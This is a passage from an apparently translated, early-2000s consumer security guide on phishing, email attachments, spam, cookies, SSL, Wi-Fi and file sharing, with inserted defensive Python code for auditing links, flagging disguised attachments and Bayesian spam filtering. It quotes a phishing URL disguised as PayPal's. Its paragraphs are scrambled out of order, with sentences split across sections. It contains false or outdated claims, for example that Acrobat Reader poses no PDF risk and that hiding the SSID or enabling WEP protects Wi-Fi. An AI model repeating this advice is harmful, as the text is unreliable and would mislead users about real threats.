whatever they want.

Distrust of pirated software

Pirated commercial software is not a new concept. Counterfeit CDs have been sold for years, and their Internet versions, known as warez, are also common. It has long been suspected that such CDs may contain viruses, but a more likely possibility is that this kind of software has been deliberately patched so that an unauthorized person can access your computer over the Internet. Because installing most software requires administrator privileges, this provides a good opportunity for programs you did not ask for to be installed.
Hidden functions of legitimate software

Although most of the software you download may be legitimate, there is a good chance that downloaded software (especially free software) will install other programs on your machine. Peer-to-peer file-sharing programs are particularly prone to this. They usually bundle other programs, many of which fall into the category of tracking and web-altering software: they monitor your web browsing, display various advertisements, and report your activities to their operator. Some of these programs are devious in that they try to hide themselves and to be nearly impossible to remove. Such a program comes with an uninstall tool which, when run, removes the uninstall tool itself, while the main program remains in place and continues to run.

Non-resident malware

Not all malware runs on your computer. It has become very common for such software to send an e-mail that somehow entices the user to visit a particular web site. The traditional trick is that the e-mail offers you something you are interested in, but while you are viewing the advertised web site, malicious software attacks your system and may download some software onto it (as in a drive-by download) or perform other operations.
In newer schemes, the e-mail claims to be an invoice from eBay (an Internet auction site) or PayPal (an Internet payment site), or to come from your bank. The message looks very convincing and points you to web sites where you can supposedly validate your credit card number. The URLs given in these messages usually look very much like legitimate ones. For example, PayPal's real URL is www.paypal.com, and the URL displayed in the e-mail may be exactly that address. However, what is shown on the screen is not the URL actually used to reach the page. The real URL is usually hidden and may look like the one shown below.

An official e-mail sent for this purpose usually contains unique information that cannot be derived from your e-mail address, such as your full name or the last four digits of your credit card. If such a message directs you to a web site, it will give you the address but will not contain a hyperlink. The destination web pages also contain information that no fraudster or spammer could know. If you are still in doubt, you can contact the company by telephone (not by e-mail) to confirm that the message is genuine.
http://www.paypal.com:user=3245329:transaction=43293:code=4333033.33@218.5.79.162

Someone who is not familiar with the fine points of URL format will assume that this address is www.paypal.com and therefore trustworthy. In fact, the characters before the @ sign should be disregarded, because this URL connects to the address 218.5.79.162. That site usually hosts a page resembling the real PayPal page and asks you to log in and enter your credit card number. The site never connects to PayPal; it belongs to someone who is trying to steal your credit card and its details. These tricks have been very successful in practice. Note that similar e-mails may also be genuine, legitimate messages that really were sent by PayPal.

E-mail

Evolution

Chapter Six: Security of Network Services

E-mail and the web are among the main uses of the Internet. In this chapter we explain in some detail how these services work and examine how improper use of them creates insecurity. Wireless communication, file sharing, and instant messaging are other sensitive topics related to network security that are covered in this chapter.

Basic principles

You should regularly apply security patches to your software. Because security problems can harm you in many ways, your exposure increases when you connect to the Internet. If there is a security flaw in your operating system or in your applications, you can be sure that attackers know about it and are using it to devise ways of breaking into your computer.

Rule four: Keep your operating system and your important applications up to date.

Being up to date does not necessarily mean using the latest versions.
Most companies and developers fix the security flaws of the versions in common use. Note that for free software this usually holds only for the latest available version. This means that if you want to stay protected from security flaws, you must regularly upgrade your software to its latest available version.

The problem was that early e-mail was designed only to carry plain text, and files such as executable programs contain non-printable characters that cannot be represented in plain text. The proposed solution was to encode the non-printable data in such a way that it could be represented in plain text (more detail on encoding is given in Appendix 1). With this method, the encoded file is decoded after the message is received and restored to its original form.

Later the concept of the "attachment" was introduced so that more types of files could be encoded. This newer method is now called MIME (Multipurpose Internet Mail Extensions). As attachments became more widely used, e-mail programs were changed so that they could open attachments automatically. The recipient could therefore see what had been sent without any extra effort.

At the same time the World Wide Web became popular, and it used HTML to format web pages. HTML
became one of the MIME encoding methods, making it possible to format e-mail messages (changing fonts, colors, images, and links to web pages). Currently, e-mail programs also automatically execute the HTML commands inside the pages they receive.

Overview

If you look at the history of the network (the past 10 to 30 years), you will see that at first e-mail was used only for sending text messages. Most systems that used e-mail relied on various other methods for transferring files. These file-transfer methods were somewhat unfamiliar and hard to use. Early on, when most e-mail users were technology specialists, this did not matter much, but as e-mail reached a wider public it had to become easier for that public to use.

The effect of e-mail enhancements

Adding these capabilities (formatting features) to e-mail programs made them more useful. From then on users could easily exchange all kinds of files. With fonts, colors, and images, messages looked better, and simple formatting could be done without a word processor. However, these enhancements also had a downside.

As mentioned earlier, before these advances nobody was directly affected by viruses and worms through e-mail, and as long as you did not run a program received as an attachment you were safe from security risks. Now, however, the programs you receive can run automatically, which means they can direct you to a web site where harmful actions such as downloading malicious software take place. In addition, special HTML commands can make an attacker the administrator of your computer; how this happens depends on the flaws in your computer's HTML interpreter.
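The disguised address described earlier for the fake PayPal message, and the point above that HTML inside a message can send you to a site of the sender's choosing, can both be checked mechanically. The following Python sketch is an added example, not part of the book: it lists every link in an HTML message body and flags links whose real host differs from what is displayed. The function names and the sample message are constructed for illustration; only the long URL is the one quoted in the text.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# The URL quoted in the text; everything else in SAMPLE_BODY is constructed.
PAGE_URL = ("http://www.paypal.com:user=3245329:transaction=43293"
            ":code=4333033.33@218.5.79.162")

SAMPLE_BODY = f"""
<p>Please confirm your account at
<a href="{PAGE_URL}">www.paypal.com</a>.</p>
<p>Help: <a href="https://www.example.org/help">www.example.org</a></p>
<p><a href="http://news.example.net/offer">Special offer</a></p>
"""


class LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def real_host(url):
    """Host that is actually contacted: the part after the last '@'."""
    return urlsplit(url).hostname or ""


def audit_link(href, shown_text):
    """Return a list of warning labels for one link."""
    findings = []
    parts = urlsplit(href)
    host = parts.hostname or ""
    if parts.username is not None:
        # Text before '@' is login information, not the site name.
        findings.append("userinfo-before-@")
    try:
        ipaddress.ip_address(host)
        findings.append("raw-ip-host")
    except ValueError:
        pass
    # Compare hosts only when the visible text itself looks like an address.
    if "." in shown_text and not any(c.isspace() for c in shown_text):
        shown = shown_text if "://" in shown_text else "http://" + shown_text
        if (urlsplit(shown).hostname or "") != host:
            findings.append("shown-host-mismatch")
    return findings


def audit_html(body):
    """Audit every link in an HTML message body."""
    collector = LinkCollector()
    collector.feed(body)
    collector.close()
    return [(href, text, audit_link(href, text))
            for href, text in collector.links]


if __name__ == "__main__":
    for href, text, findings in audit_html(SAMPLE_BODY):
        print(f"{text!r} -> {real_host(href)} {findings}")
```

A link with no findings is not thereby proven safe; the check only catches the mismatch between the displayed and the real destination.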
E-mail is deceptive

Rule five: Configure your e-mail program so that it does not open attachments automatically.

Anyone who knows your e-mail address or can guess it can send you a message with an attachment. The attachment may be useful, or it may be a virus, worm, or Trojan horse that can seriously damage your system. Most modern e-mail programs do not open attachments without your permission, but if yours opens them automatically, you should be able to disable that option.

Rule six: Before opening any attachment, look carefully at its name to make sure it is not an executable program.

Virus writers are very clever. They often send attachments with names such as budget.xls.vbs. A viewer who does not know what vbs is will think they have been sent a Microsoft Excel file named budget (especially when the operating system is configured not to show known file extensions to the user). In reality the file is an executable Visual Basic program whose name is budget.xls: the xls is just part of the file name and has nothing to do with Excel. In the worst case, this program could erase your system's entire hard disk.

In many cases the e-mail address shown in the "From" field is not valid. Spammers use this capability to abuse your system. Sometimes, by examining the full header, you may be able to work out where the message really came from and who sent it.

Rule seven: Never open an attachment sent to you by someone you do not know, unless you are certain that that type of file cannot contain malicious code.
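Rule six can be applied automatically before a message ever reaches the reader. The following Python sketch is an added example, not part of the book: it walks the attachments of a message and classifies each by its final extension, which is the one the operating system acts on. The extension lists are short illustrative assumptions rather than complete lists, and the sample message is constructed.

```python
import os
from email import message_from_bytes, policy
from email.message import EmailMessage

# Illustrative, incomplete lists (assumptions of this example).
EXECUTABLE_EXTS = {".vbs", ".vbe", ".exe", ".scr", ".bat", ".cmd",
                   ".com", ".pif", ".js"}
DOCUMENT_EXTS = {".xls", ".doc", ".pdf", ".txt", ".jpg", ".gif"}


def classify_name(filename):
    """Classify an attachment by the extension the system will act on."""
    parts = [p.strip() for p in filename.strip().lower().split(".")]
    if len(parts) < 2:
        return "no-extension"
    if "." + parts[-1] in EXECUTABLE_EXTS:
        # An inner document-like extension is there only to mislead.
        if len(parts) >= 3 and "." + parts[-2] in DOCUMENT_EXTS:
            return "disguised-executable"
        return "executable"
    # The name alone does not clear the file: documents can carry macros.
    return "not-executable-by-name"


def displayed_name(filename):
    """What the user sees when known extensions are hidden."""
    root, _ext = os.path.splitext(filename)
    return root


def audit_attachments(raw_message):
    """Return (filename, classification) for each attachment."""
    msg = message_from_bytes(raw_message, policy=policy.default)
    report = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        report.append((name, classify_name(name)))
    return report


def build_sample_message():
    """Constructed message with three placeholder attachments."""
    msg = EmailMessage()
    msg["From"] = "accounts@example.com"
    msg["To"] = "user@example.org"
    msg["Subject"] = "Budget"
    msg.set_content("See attached.")
    for name in ("budget.xls.vbs", "minutes.pdf", "setup.exe"):
        msg.add_attachment(b"constructed placeholder bytes",
                           maintype="application",
                           subtype="octet-stream",
                           filename=name)
    return msg.as_bytes()


if __name__ == "__main__":
    for name, verdict in audit_attachments(build_sample_message()):
        print(f"{name:16} shown as {displayed_name(name):12} {verdict}")
```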
How can you protect yourself?

Remember that programs such as Microsoft Word (a word processor), Microsoft Excel (a spreadsheet), and all similar programs support macros, which can contain viruses. Even PDF files can contain malicious code (although these files can be dangerous only when they are opened with Adobe Acrobat Professional; opening them with programs such as Adobe Acrobat Reader, which is far more widely used, poses no particular risk). Consult the user manual or the help pages to find out how to disable certain features, especially those that are rarely used on your system.

Rule eight: Do not open attachments even from people you know and trust, unless you are sure that the sender has checked the attachments and sent them to you deliberately.

Your friend's machine may have a virus that, without their knowledge, sends infected files to everyone in their address book.

Rule ten: Ask your ISP whether it scans e-mail for viruses and similar threats before delivering it.

Because worm and virus activity keeps increasing, most ISPs do this. Do not expect your ISP's filtering to be one hundred percent effective, but preventive action by ISPs can support your own security efforts. If your ISP is not aware of security issues, it is worth working with them so that they provide a more secure service to you and to their other customers. For example, you could give them a free copy of the book you are reading now!

Rule nine: Check the configuration of your e-mail program so that it does not process fancy HTML and does not send infected files to other computers.
This means you may lose some of the decorative features of e-mail, but in return you gain better control over what your e-mail program does. Note that in some e-mail programs you do not even have to open a message containing HTML for the code to run; displaying the message in the preview pane is enough. Although e-mail can contain HTML code, many browsers and e-mail programs let you disable cookies, JavaScript, and plug-ins for pages received as part of an e-mail message.

Spam

Spam is the name given to unsolicited e-mail, particularly commercial messages sent in bulk by unknown parties, presumably in the belief that the recipient will be interested in their products. The volume of spam has grown dramatically in recent years. In 2003, more than 50% of all e-mail exchanged on the Internet was spam! Many people now receive about 10 spam messages for every legitimate one.

If spam carried a marker such as "**SPAM**" in the "Subject" field, we could easily delete all of it. Enacted laws provide that unsolicited e-mail sent by commercial companies is subject to prosecution. However, because of the sheer volume of spam and the limited capacity of law enforcement, enforcing such laws is currently not very practical. Everyone needs a sensible way to identify and delete spam without having to read it or to send a complaint to an overloaded complaint system.

More about spam

• You have registered a domain name for yourself, or listed your address in the technical support group of a web site.
• You have used an easily guessable e-mail address.
• You have placed your address on a system that has previously been broken into.

To understand the problems spam causes, three points need to be considered:
a) How spammers obtain your address.
b) What counts as spam (in precise detail).
c) Why spammers send it.

a) Spammers have an opportunity to obtain your address if any of the following is true:
• You have sent a message or your signature to a public mailing list.
• You have replied to a spam message, for example to ask to be removed from the list of recipients.
• You have posted to newsgroups.
• You have registered on a web form for any reason and entered your address in it (even if you are quite sure that you were dealing with a reputable organization).
• You have used a computer on which an ident daemon was running (this

If any of these applies to you, there is a good chance that your address will be misused or even sold to spammers. In other words, if you use the Internet for any reason, you may end up on spam recipient lists.

b) Some commercial messages are so numerous and so irrelevant that everyone recognizes them as spam. With other messages it is less obvious. In some cases, whether a received e-mail is spam depends on the recipient. The following examples help to clarify this:
• Is an e-mail containing information about facial care spam? Answer: Yes, it is spam, unless you are a plastic surgeon and the e-mail is an academic paper rather than an advertisement.
• Is a call for papers for an academic conference on an obscure topic, sent to several mailing lists, spam? Answer: Maybe, unless the topic happens to interest you and you want to respond to it.
• If a company that sold you a product sends information about its next product to you and to many other customers, has it sent spam? Answer: No. But the spam filter at your ISP may spend a long time working out whether such a message is spam.

identification program, on many UNIX systems, gives your user name to anyone who asks for it).
• You have allowed your browser to store your address.
• You have used instant messaging software.
• You have put your e-mail address on a web page, making it visible to everyone.

c) Why do spammers send spam? The simplest answer: because it works! If you examine spam, you quickly notice a pattern in it. Spam is usually about things like making or saving money, improving your love life or personal life, and improving your health. These topics have one important thing in common: most of us have serious concerns about them, and some of us pay a great deal of attention to them. So even if only a tiny fraction of recipients follow up on these messages (say, about 1 in every 100,000 recipients), spammers who send several million messages a day can make a lot of money this way.
What should be done about spam?

There are many ways to limit and control spam. Some governments have enacted laws in their jurisdictions to curb the spread of spam. Most ISPs hold that using their facilities to send spam violates their service agreements. Enacting such laws can be effective, but so far enforcing most spam laws has been very

Some large e-mail users (such as companies) refuse to accept e-mail originating from ISPs that allow spammers to operate. This can be effective because it forces ISPs to shut down spam-related activity. However, it usually also hurts innocent customers who send a small amount of e-mail to various destinations. Many programs exist for detecting spam, deleting it, or warning the recipient that a message is spam. These programs can run at the ISP's site or in the mail client. They examine a message's content and origin, but because these criteria are hard to evaluate, the programs usually produce both false negatives and false positives.

False negative
A false negative occurs when the scanning program reports that a message is not spam when in fact it is. This means the program lets spam through the filter, which is why such a program is said not to be 100% effective.

False positive
A false positive means the scanning program reports that some harmless messages are spam. This can do a great deal of damage, especially if the message is deleted instead of being delivered as a result. False positives can cause ordinary, harmless e-mail to be lost irretrievably.
difficult and costly, and in many cases no enforcement mechanism has been devised for them.

• If an e-mail contains material that counts as spam by every definition, is it necessarily spam? Answer: Yes, but only if it is the original that is being sent. If, for example, the message was sent by a reader to the authors of this book and quotes interesting examples of spam, it is certainly not spam and should not be filtered.

The goal of spam-scanning programs is to minimize false negatives and to eliminate false positives. Unfortunately, reducing false negatives usually increases false positives. People who for whatever reason need to receive e-mail that resembles spam can be hurt by this. The most recently reported case involved an academic newsletter that discussed spam. Because the newsletter contained examples of spam, scanners identified it as spam, and many ISPs filtered and deleted it.

Besides spam scanners, there are spam-filtering methods that use challenge-response techniques. With this approach, when a message arrives from an unknown sender it is held in transit (before the recipient opens it). A challenge is then sent to the sender asking them to confirm the message they sent, to prove that it came from that person and not from someone else or from a program.
The confirmation form is designed so that it cannot be handled automatically and cannot be reused for later spam. If no confirmation is received within a few days, the message is deleted instead of being delivered. The drawback of this method is that it requires manual action by the sender. If you send a message and cannot respond promptly to the confirmation request, your message will not be delivered. Moreover, if two ISPs both use this service, they may never receive mail from each other: the first recipient does not see the message until it has been confirmed, and the confirmation request will not go through either, because its sender is unknown. Some spam filters place suspicious messages in a special folder instead of deleting them. You can then check the spam folder periodically to make sure its contents are not victims of false positives.

A promising new anti-spam technique is Bayesian filtering. With this method the filtering rules are refined according to your own judgment of what is spam, so the rules can differ from one recipient to another. The aim is for the filter to learn from your behavior so that it can recognize the people you trust and reject content that is not normally classified as spam but that, for whatever reason, you do not want. Bayesian filters use linguistic techniques to let through messages containing particular words that, judging by your past e-mail, are used in your genuine mail but rarely appear in spam. Bayesian filters are available for most e-mail programs.

If spam has become a problem for you, find out whether your ISP offers spam detection and filtering. You should also check your e-mail software to see whether it can filter spam.
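The trade-off between false negatives and false positives, the case of the newsletter that was filtered because it quoted spam, and the per-recipient learning of a Bayesian filter can all be seen in a few lines. The following Python sketch is an added example, not part of the book and not the algorithm of any particular product: it is a minimal naive Bayes word filter with add-one smoothing, and every message in it is constructed.

```python
import math
import re
from collections import Counter

# Constructed training mail shared by every recipient.
GENERIC_SPAM = ["earn money fast guaranteed",
                "free money offer click now",
                "lose weight fast free offer"]
GENERIC_HAM = ["meeting agenda for monday project review",
               "lecture notes and project schedule attached",
               "lunch on monday with the project team"]
# Constructed mail that one recipient, who studies spam, marked as wanted.
USER_HAM = ["research newsletter on spam examples",
            "newsletter research notes spam examples attached",
            "research newsletter spam examples free offer quoted"]
# A wanted message that quotes spam, like the newsletter in the text.
NEWSLETTER = "research newsletter spam examples free money offer"


class BayesFilter:
    def __init__(self):
        self.words = {True: Counter(), False: Counter()}  # word counts
        self.msgs = {True: 0, False: 0}                   # message counts

    @staticmethod
    def tokens(text):
        return re.findall(r"[a-z]+", text.lower())

    def learn(self, text, is_spam):
        self.words[is_spam].update(self.tokens(text))
        self.msgs[is_spam] += 1

    def score(self, text):
        """Log-odds that the text is spam; above zero leans towards spam."""
        vocab = set(self.words[True]) | set(self.words[False])
        n_spam = sum(self.words[True].values()) + len(vocab)
        n_ham = sum(self.words[False].values()) + len(vocab)
        total = math.log(self.msgs[True]) - math.log(self.msgs[False])
        for word in self.tokens(text):
            if word in vocab:  # words never seen in training are ignored
                total += math.log((self.words[True][word] + 1) / n_spam)
                total -= math.log((self.words[False][word] + 1) / n_ham)
        return total

    def is_spam(self, text, threshold=0.0):
        return self.score(text) > threshold


def build_generic_filter():
    """Filter trained only on the shared mail."""
    f = BayesFilter()
    for text in GENERIC_SPAM:
        f.learn(text, True)
    for text in GENERIC_HAM:
        f.learn(text, False)
    return f


def build_personal_filter():
    """Same filter after learning from this recipient's own wanted mail."""
    f = build_generic_filter()
    for text in USER_HAM:
        f.learn(text, False)
    return f


if __name__ == "__main__":
    generic, personal = build_generic_filter(), build_personal_filter()
    print("generic filter flags newsletter:", generic.is_spam(NEWSLETTER))
    print("strict threshold misses 'earn money':",
          not generic.is_spam("earn money", threshold=4.0))
    print("personal filter flags newsletter:", personal.is_spam(NEWSLETTER))
```

Raising the threshold on the generic filter rescues the newsletter only by letting real spam through, whereas learning from the recipient's own mail rescues it while the obvious spam is still caught.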
Using the World Wide Web

When this book was written in 2003, the web had been available to the public, at various levels of access, for about 10 years. The web is now essential for those who regularly use the network for work, school, and leisure. Because the web has become such a useful and common tool, it has been forgotten that it can be a hostile environment.

Keeping browsers secure

In general the web is relatively safe, but using it also carries potential risks. Web sites usually consist of static text and images, but they can also contain dynamic programs that are intended to run on your computer.

Rule eleven: Do not allow web sites to download and run malicious programs on your computer, unless you fully trust the site.

Unfortunately, dynamic and automatic downloading of programs can also be dangerous and destructive. All browsers let you download and run JavaScript, Java, ActiveX, and other programming tools on your computer, but if you want to be completely safe you should not permit these programs to run. Of course, once you disable these features you will find that many web sites no longer work as they did before.

Rather than blocking access to all these web sites, look for a sensible solution:
• Enable relatively safe and common features such as JavaScript. This allows many web sites to function correctly.
• Disable features such as Java and ActiveX, which are less safe and less widely used, or set your browser to ask for your permission before using them. Disabling these features means that some browser functions will stop working. Some web sites may then display a warning, and others may stop working altogether. If you do not want this to happen, the browser must be able to detect what the web site requires and, for downloading and

Rule twelve: Pay attention to the address of the web site and to the address you are connecting to, and keep an eye on it when you are viewing an unfamiliar web site, especially if you have allowed that site to run a program on your computer.

Web browsers can be set to display the address of the web site you are viewing (this feature is usually called the navigation bar or address bar). When your cursor points to a link, the browser can show the address the link points to (the status bar). Seeing that address tells you which other web site you are about to be sent to, a site that may be untrustworthy or that you may not want to visit. In practice you may not want to check the navigation bar and the status bar with every click, but when you are on an unfamiliar web site, especially if you have enabled Java or ActiveX, you should use these tools so that you notice if you are redirected to a new web site without intending it.

Cookies

A cookie is information that the browser writes to the computer's hard disk when you view a remote web site.
When you later view the same web site again, your cookies are sent back to that site. Each cookie belongs to the web site that created it, although some flaws in browsers allow sites to see each other's cookies. A cookie reminds the web site who you are, what your preferences are, and what you did on that site before. For example, when you log in to a web site with your user name and password, the site stores this information in a cookie on your computer. When you return, say a week later, you may be logged in automatically on the basis of the information in that cookie. Cookies also allow web sites to track what you do during a session.

Although a cookie can normally be retrieved only by the web site that created it, the site you are viewing may contain images and other objects that belong to a second web site (called a foreign site or third-party site), and that second site can also store and retrieve cookies. Because images can be invisible, you may not notice at all that this has happened. These invisible images can be used for advertising purposes by tracking the web sites you visit.

Dynamic downloading of programs can sometimes be very useful. It lets you use online services, for example to scan for viruses and fix security problems. It also allows your software to be installed and updated easily, without the user having to carry out complex, technical, multi-step procedures.

running the program needed to display the site's content correctly, ask you first.
Note: Suppose sites A, B, C, and D all display an invisible image from site Z. When the image is displayed in your browser, Z learns which site referred to it, and then stores cookies to remember which sites you visited. From then on Z has good information about what interests you and can use that information to send you advertising.

Rule thirteen: Find out how cookies are being stored on the computer. If you cannot control them (for example when you are using a computer in a public place), do not enter your private information on that computer.

All web browsers give you some degree of control over whether cookies are allowed. In some cases the browser may distinguish between cookies stored on your computer, cookies that disappear when the browser is closed, and cookies stored when you view web sites and foreign sites. Essentially, you can allow all cookies to be stored, prevent them from being stored, or have the browser ask you before storing them. You are never told when the information stored in a cookie is sent back to the originating web site.

Cookies can be inspected because they are stored as text, but since their contents are encoded by the originating web site they are usually not intelligible. Some browsers let you view and delete cookies, and there are third-party programs that let you manage them as well.

If you want to control what a web site knows about you, you must control when and how cookies are stored on your computer. Note that some web sites need to store cookies on the user's computer in order to work properly. These sites generally tell you that they cannot carry out or complete an operation when cookies are disabled.
If you use web browsers in public places (such as Internet cafés, libraries or schools), bear in mind that cookies containing your information are stored on those machines. In many cases the computer's administrator will not have given you enough access to control, view or delete the cookies. Your information therefore stays on that computer and may be used by someone else who visits the same website. If you have logged in to a website and your credentials have been stored in a cookie, and another user then visits the same site, that user may be logged in automatically in your place. As a result the website may hand your stored information (such as your name, address and credit card details) to that user.

This can be a problem even on a private computer that several people use. In these cases cookies are not only a privacy problem but also a security vulnerability.

Web browser cache

When a browser retrieves a page or image from a website, it usually also stores a copy of the displayed page on the computer's hard disk. This collection of stored pages and images is called the "cache". If you visit the website again and the page has not changed, the browser may not download the whole page from scratch but may use the cache to display it. In some cases web pages held in the cache can also be viewed offline (that is, without an Internet connection). This means that whatever you view in the browser has been stored on the computer's hard disk. So if you use the web for financial transactions, your purchase information, credit cards and bank accounts will be fully readable and recoverable on that computer. Depending on how much browsing is done and on the size of the cache, these pages and images can remain on the computer for varying lengths of time.

Rule 14: If your private information has been displayed on a web page, clear the cache when you have finished. If you cannot do this (for example when using a public computer), you should not use that computer to exchange confidential personal information.

All browsers let you clear the cache (called Temporary Internet Files) from the system, but many computers used in public places do not allow the cache to be controlled or deleted. Although clearing the cache after entering sensitive information is extremely important, so far no browser has placed an icon on its toolbar that clears the cache easily with one click.

Secure transmission

All the messages you send and receive on the web are in plain text. This means that if someone can intercept them in transit, he will be able to read and understand them. If part of the Internet connection is wireless, or the ISP at the far end of the connection is not trustworthy, interception in transit becomes easier and paying attention to it becomes much more important.

Browsers and web servers use encryption to solve this problem. Encryption alters the message, so that it becomes very hard or even impossible for unauthorized people to read the encrypted message (for more detail see Appendix 1 of this Part). The name of the encryption protocol is "SSL" (Secure Socket Layer). You can use SSL for the messages you receive. Most browsers show a small picture of a padlock that is open for ordinary transmission and closed for SSL transmission. In that case the page's URL begins with "https" instead of "http". If it is possible in your country, it is best always to use the strongest encryption method.

Note that the padlock does not indicate whether the message sent from you to the server has used SSL for encryption, but the assumption is that if the page sent to you was encrypted, the returned message is also transmitted encrypted.

SSL works only when the browser knows who it is talking to. This is achieved with the help of a security certificate and a digital signature. In general, if a web server wants to be trusted it must obtain a security certificate from a recognized certificate authority. If that authority is to do its job properly, it must check that the party requesting the certificate is who it claims to be. The authority then digitally signs the certificate, and your browser stores tables for recognizing these certificates.

Sometimes you receive a message from a website saying that its digital certificate has expired or belongs to another location. The first case arises when the certificate's validity period has recently ended and the website has to go through the administrative formalities of renewing it. In the second case the site has usually changed its name and the change has not been reflected in its certificate. Even so, if you want an appropriate level of safety, in both cases you should end your connection with the site until the problem has been resolved in some way.

Is secure transmission enough?

The small padlock was designed for secure transmission on the web and shows that the transmission is safe. However, transmission is not the only thing that has to be examined to ensure security. Only a small percentage of fraud or identity theft occurs because of insecure transmission. Most problems are matters such as:

• a lack of ethical principles at some websites;
• misuse of personal websites;
• misuse of personal computers.

The main exception here is "wireless transmission", which is examined in the next section.
Privacy policies

Many websites have published policies for protecting people's privacy. These policies specify what kind of information may be collected at the website, what may or may not be done with that data, and how the data must be protected. Every website that collects personal or financial information should have an appropriate, published privacy policy.

Wireless transmission

The use of wireless technology is increasing in both developing and developed countries. It is usually cheaper than wired technology, is easier and quicker to install in private premises, and has fewer regulatory problems. Nevertheless wireless technology has two potential problems:

• Information may be stolen in transit.
• Transmission speed and quality may vary with location, weather, time of day, proximity of radio equipment, line speed, installation quality and destructive interference.

Not much can be done about the second group of problems. They are characteristics of wireless technology and part of the price that has to be paid for using wireless communication. The way to counter interception is to use the various encryption methods (for more detail on encryption methods see Appendix 1 of this Part). If you have a server that supports encryption, be sure to use it (for example SSL-based websites). If you use POP-based e-mail you should select the APOP option so that passwords are encrypted before they are sent. This feature provides end-to-end security independently of the transmission medium. If the server does not use encryption, you must be aware of the limitations of the technology and, where necessary, decide how you will use the connection.
802.11 or Wi-Fi

802.11 is a set of evolving IEEE standards for wireless local area networks (wireless LANs). 802.11, usually called Wi-Fi (Wireless Fidelity), has become popular as a replacement for wired Ethernet for connecting home computers and laptops; its advantages are its low cost and its relative speed.

Unfortunately, most Wi-Fi implementations have several vulnerabilities:

• Base stations do not communicate with one another securely and reliably.
• If you want to share your network connection with someone else, you must change your network name (SSID) from its default and configure it so that the name is not visible to unauthorized people. Once this is done, only people who know the SSID will be able to see the network connection.
• Its encryption algorithm (WEP) is weak and can easily be broken. Nevertheless, in the absence of better methods you can enable it. Remember that if someone really wants to examine your transmissions (such as your password), this method will be very vulnerable. There is, however, a newer encryption method (WPA) that remedies the shortcomings of WEP and is available on newer equipment. Using it on Wi-Fi networks is strongly recommended.

Mobile phones

Mobile phones (also called handheld phones or cell phones) are widely used to carry voice and can sometimes also be used to carry data. Many mobile phone technologies can be eavesdropped on and intercepted and are therefore not secure.

Long-haul links

Long-distance connections, especially to remote areas, are usually provided using wireless technologies. These links can serve several users at the same time. If the transmission is directional (using dish antennas or Yagi antennas), eavesdropping will be difficult without special equipment. Where necessary these links can be encrypted using hardware encryption equipment.

Wireless local loop telephones

This technology is used in homes and offices in many countries. It makes low-cost, trouble-free installation of telephone lines possible and does not have the problems of wired infrastructure equipment. Moreover, unlike copper wires, wireless equipment cannot be stolen along the route and sold. Like wired telephones, however, when a modem is connected to these lines they can carry other kinds of data instead of voice. Wireless technology may be open to eavesdropping. Depending on local conditions, national laws and local regulations, you can ask your ISP to check whether the connection is encrypted.

Other Internet issues

File sharing

Where there is more than one computer, shared files are one of the most important and most useful tools available on a network. In its simplest form this feature lets you, while working on one system, access the files on another system, modify them, create new files on that system, or delete files that exist there. The two systems may both be in the same room or each in a different hemisphere. File sharing makes it possible to reach the files on your own computer while you are travelling.

A single computer acting as a file server can be regarded as the hard disk of a large number of computers. In that case most of your files reside on the file server and you can therefore reach them over the network.
The obvious vulnerability here is that if you can reach your files remotely, other people can do the same. A lesser vulnerability is that if you share files with others, you are not safe from vulnerabilities that may affect their computers. For example, if a computer that has access to your files is infected by a virus, your files may become infected too.

Rule 15: If you do not use file sharing, disable it. If you need it, limit your access to what you really require.

Rule 16: If you use file sharing, use strong usernames and passwords, and restrict access permissions to the minimum with which you can still do your work.

Rule 17: If you share files with others, make sure they take security seriously.

File sharing and remote access features allow you to use usernames and passwords to control access, and usernames and passwords enable you to control what a user does (read, write, create and delete). Many systems can control every action of a user. For example, you can restrict remote access facilities so that files may only be read. In other words, if you do not need write access you should disable it.

Systems that support some file sharing features can also share printers. Although remote access to a printer is not particularly risky, it is better to disable it unless it is necessary. There may be a flaw in remote printer access that allows permissions issued specifically for printing to be used for malicious actions.

Instant messaging

Instant messaging makes it possible for a message typed on one computer to appear at the same moment on other computers. Unlike e-mail, the sender and the receiver must both be connected to the network at the same time. There are various instant messaging programs, among them IRC (Internet Relay Chat), MSN Messenger, AIM (AOL Instant Messenger), Yahoo Chat and ICQ (an abbreviation of the phrase "I Seek You"). Internet services such as AOL, MSN, Yahoo, Internet game hosts and so on each have their own Messenger and Chat. Some of them exchange information with the others and some do not.

Many instant messaging systems let the user choose a name that is displayed with the messages he sends, so that others can send messages to him. These names may keep your real identity hidden, although system administrators may be able to identify you from your IP address.

Rule 18: Instant messaging can be very useful, but use it with full awareness and care.

Instant messaging is useful for several reasons:

• While you are busy with something else, messages are received and sent in a small window on your screen and do not interrupt your other work very much.
• You do not need to reveal your e-mail address (and identity) to the other participants in instant messaging conversations.
• It is easier and faster to use than e-mail and has almost no delay. This makes conversations held over it more practical than e-mail.

In particular cases instant messaging is preferable to e-mail. Some people also consider the service safer, because messages are not copied to other places on disk, whereas this does happen with e-mail. Even so, users are still warned that their instant messages may not be secure. The main problem with messaging systems is that some of them can also transfer files. This exposes them to the same problems as other file sharing facilities, such as e-mail attachments. Some instant messaging systems also allow commands to be run remotely, and this can lead to an attack.

Unnecessary active services

Operating systems and applications are very powerful and capable. In most cases an ordinary user does not need all the features present in the software. Services that are not needed should be disabled. Unfortunately some software vendors enable all the features of their programs and leave it to the user to use them or not, and in most cases the user is not even aware that these services exist. For example, for several years in a row some UNIX systems were designed so that every machine running them could act as an unrestricted e-mail hub (unless the user disabled the feature). This allowed spammers to use these machines to distribute spam without many of the machines' owners knowing that such a capability existed.

Rule 19: Disable all Internet services that are not needed and that you rarely use.

Software vendors are increasingly becoming aware of the problems. So, despite their interest in developing and shipping systems with many capabilities, they release their programs with secondary services disabled, and the user can enable each of them if needed. It is very important that services which are not specifically used remain disabled. Such services include file and printer sharing, web servers, e-mail servers, File Transfer Protocol servers (FTP servers), Remote Procedure Call servers (RPC servers) and so on.

Chapter 7: Tools for Improving Security

Overview

